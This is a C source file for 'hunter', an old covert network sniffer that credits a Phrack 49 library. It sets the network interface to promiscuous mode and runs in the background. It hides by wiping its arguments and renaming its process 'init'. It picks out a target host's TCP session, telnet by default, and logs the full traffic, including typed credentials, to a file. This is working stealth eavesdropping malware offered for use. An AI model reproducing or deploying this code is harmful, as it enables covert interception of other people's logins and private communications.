/*
** Copyright (c) 1997 by TICK (t_i_c_k@hotmail.com)
**
** - lnw.h is Part of PHRACK 49-07 and was written by route and halflife
**
** Usage: hunter [-s <source>] [-d <destination>] [-p <port>]
*/

#include <ctype.h>
#include <time.h>
#include "lnw.h"
#include "error.h"
#include "auth.h"

#define DFLTPORT  23
#define LOG       "./hunter.log"
#define PS_FAKE   "init"

#define INPUT     "> "
#define OUTPUT    "< "


int   EyeOnWire(int wire);
int   FilterMatrix(void);
void  PrtHdr(void);
void  PrtBot(void);
void  PrtData(char *data, int datalen);
void  Ouch(int signr);
void  ClearArg(char *arg);

/*
** Packet Declarations.
*/
struct etherpacket
{
  struct ethhdr eth;
  struct iphdr  ip;
  struct tcphdr tcp;
  char          data[8192];     /* much too big */
} e_pack;

struct iphdr  *ip;
struct tcphdr *tcp;

/*
** Other Stuff.
*/
FILE  *log;

u_int filter_src; 
u_int filter_dst;
u_int filter_prt;

char  *direction;

struct
{
  u_long  src;
  u_long  dst;
  u_short port;
} rules;  

struct
{
  u_long  src_addr;
  u_long  dst_addr;
  u_short src_port;
  u_short dst_port;
  u_char  active;
  u_int   amount;
  time_t  start_time;
} victim;


/***************************************************************************
*     M A I N
*/

int main(int argc, char **argv)
{
  int opt;
  int wire;
  int datalen;
  
  Me = argv[0];
  if(!Auth(NULL, 2, EraseMe))
  {
    fprintf(stderr, "\nYOU CAN'T BRING ME DOWN, SUCKER!\n");
    exit(1);
  }

  ip   = (struct iphdr *)  ( ( (u_long) &e_pack.ip  ) - 2 );
  tcp  = (struct tcphdr *) ( ( (u_long) &e_pack.tcp ) - 2 );
  
  opterr = 0;
  while( (opt = getopt(argc, argv, "s:d:p:")) != EOF)
    switch(opt)
    {
      case 's':
        rules.src = nameResolve(optarg);
        filter_src++;
        break;
      case 'd':
        rules.dst = nameResolve(optarg);
        filter_dst++;
        break;
      case 'p':
        rules.port = htons((u_short) atoi(optarg));
        filter_prt++;
        break;
      default:
        err_mesg(FATAL, "Don't know option -%c\n", opt);
    }
    
  if(!filter_src && !filter_dst)
    err_mesg(FATAL, "\nYou haven't specified a target!\n");

  if(!filter_prt)  /* user don't give port# -> so use default */
    rules.port = htons(DFLTPORT);

  /*
  ** Print out Hunt Rules.
  */
  printf("\nHUNTING RULES");
  printf("\n^^^^^^^^^^^^^");
  printf("\n\tSOURCE:      %s", (rules.src) ? hostLookup(rules.src) : "DOESN'T MATTER");
  printf("\n\tDESTINATION: %s", (rules.dst) ? hostLookup(rules.dst) : "DOESN'T MATTER");
  printf("\n\tDEST. PORT:  %d %s\n\n", ntohs(rules.port)
                                     , rules.port ? "" : "-> ANY PORT" );
  fflush(stdout);  

  /*
  ** Open LogFile.
  */
  if( (log = fopen(LOG, "a")) == NULL)
    err_mesg(FATAL_SYS, "\nCan't open file %s", LOG);
  
  /*
  ** Set Signals.
  */
  signal(SIGHUP,  SIG_IGN);
  signal(SIGINT,  Ouch);
  signal(SIGTERM, Ouch);
  signal(SIGKILL, Ouch);
  signal(SIGQUIT, Ouch);
  signal(SIGCHLD, reaper);
  
  
  /*
  ** Set EthernetInterface in PROMISC Mode.
  */
  wire = tap(DEVICE);
  
  /*
  ** DaemonSpell.
  */
  shadow();
  
  /*
  ** Clean CmdLine.
  */
  while(argc)
    ClearArg(argv[--argc]);
  strcpy(argv[0], PS_FAKE);
  
  /*
  ** Start Hunting...
  */
  while(1)
  {
    datalen = EyeOnWire(wire);

    /*
    ** We catch a packet that passes our filter rules.
    ** Let's look at it's contents.
    */
    PrtData(e_pack.data-2, datalen);
    fflush(log);
  }

}


/**********************************************************************
*     E Y E   O N   W I R E
*/

int EyeOnWire(int wire)
{
  int bytes;
  
  while(1)
  {
    if( ( bytes = read(wire, &e_pack, sizeof(e_pack)) ) > 1 )
    {
      if(!FilterMatrix())
        continue;
      
      bytes -= (ETHHDR + IPHDR + TCPHDR);
      if(bytes < 1)
        continue;
        
      return(bytes);
    }
  }
}


/************************************************************************
*     F I L T E R   M A T R I X
*/

int FilterMatrix(void)
{
  /*
  ** First check the protocol type.
  */
  if(ip->protocol != IPPROTO_TCP)
    return(0);
    
  /*
  ** Examine FilterRules
  */
  if( ntohs(rules.port) )   /* filter rules for port numbers */
    if(tcp->dest != rules.port && tcp->source != rules.port)
      return(0);
    
  if(!victim.active)
  {
    if(!tcp->syn)
      return(0);
      
    if(filter_src)
      if(ip->saddr != rules.src)
        return(0);
    
    if(filter_dst)
      if(ip->daddr != rules.dst)
        return(0);
    
    /*
    ** A new connection from/to our victim was initiated.
    */
    
    victim.src_addr   = ip->saddr;
    victim.dst_addr   = ip->daddr;
    victim.src_port   = tcp->source;
    victim.dst_port   = tcp->dest;
    victim.active     = 1;
    victim.amount     = 0;
    victim.start_time = time(NULL);
        
    PrtHdr();
    return(0);  /* Let's EyeOnWire() wait for data */
  }
  
  /*
  ** We already capture an established connection, so ignore the packet
  ** if it's a TCP SYN.
  **
  ** This check isn't really necessary but it's faster.
  */
  if(tcp->syn)
    return(0);

  /*
  ** It's a TCP packet of an already established connection, so let's check
  ** if it's part of our data-stream.
  **
  ** We check for both directions.
  */
  if(tcp->dest != victim.dst_port && tcp->dest != victim.src_port)
    return(0);
  if(tcp->source != victim.src_port && tcp->source != victim.dst_port)
    return(0);
  if(ip->saddr != victim.src_addr && ip->saddr != victim.dst_addr)
    return(0);
  if(ip->daddr != victim.dst_addr && ip->daddr != victim.src_addr)
    return(0);
    
  /*
  ** Check if the connection is closed.
  */
  if(tcp->rst || tcp->fin)
  {
    victim.active = 0;

    PrtBot();

    return(0);
  }

  /*
  ** The connection continues...
  ** Examine the direction...
  */
  direction = (ip->saddr == victim.src_addr) ? INPUT : OUTPUT;
  
  return(1);
}


/***********************************************************************
*     P R T   H D R
*/

void PrtHdr(void)
{
  fprintf(log, "\n################################[ LOG START ]################################\n\n");
  fprintf(log, "%s [%d] => %s [%d]\n", hostLookup(ip->saddr)
                                     , htons(tcp->source)
                                     , hostLookup(ip->daddr)
                                     , htons(tcp->dest) );
  fprintf(log, "\n|-------------------------------[   DATA    ]-------------------------------|\n");
}


/***********************************************************************
*     P R T   B O T
*/

void PrtBot(void)
{
  time_t tiktak;
  
  tiktak = time(NULL);
    
  fprintf(log, "\n\n|-------------------------------[  CLOSED   ]-------------------------------|\n\n");
  fprintf(log, "CLOSED BY: %s Flag\n", (tcp->rst) ? "RST" : "FIN");
  fprintf(log, "INIT AT  : %s", asctime(localtime(&victim.start_time)) );
  fprintf(log, "RESET AT : %s", asctime(localtime(&tiktak)) );
  fprintf(log, "AMOUNT   : %d Bytes", victim.amount);
  fprintf(log, "\n\n################################[  LOG END  ]################################\n");
}


/***********************************************************************
*     P R T   D A T A
*/

void PrtData(char *data, int datalen)
{
  int ctr, ctr2;
  
  victim.amount += datalen;
  
  for(ctr = 0, ctr2 = 0; ctr < datalen; ctr++)
  {
    if(!ctr2)
      fprintf(log, "\n%s", direction);

    if(ctr2 > 75)
      ctr2 = 0;
    else if(data[ctr] == 13 && data[ctr+1] == 10)   /* NETASCII <CR><NL> */
    {
      ctr++;
      ctr2 = 0;
    }
    else if(isprint(data[ctr]))
    {
      fprintf(log, "%c", data[ctr]);
      ctr2++;
    }
    else
    {
      fprintf(log, "[0x%02X]", data[ctr]);
      ctr2++;
    }
  }
}


/***************************************************************************
*     O U C H
*/

void Ouch(int signr)
{
  fprintf(log, "\n      OUCHhhh!!!!      ");
  fprintf(log, "\n   _______________     ");
  fprintf(log, "\n || Someone    |  \\   ");
  fprintf(log, "\n ||  shoot me! |   >   ");
  fprintf(log, "\n ||____________|__/    ");
  fprintf(log, "\n\n");
  
  fclose(log);
  sync();
  
  exit(0);
}


/*********************************************************************
*      C L E A R   A R G
*/

void ClearArg(char *Arg)
{
  char *cTmpStr = Arg;

  while(*Arg != '\0')
    *Arg++ = ' ';

  *cTmpStr = '\0';
}
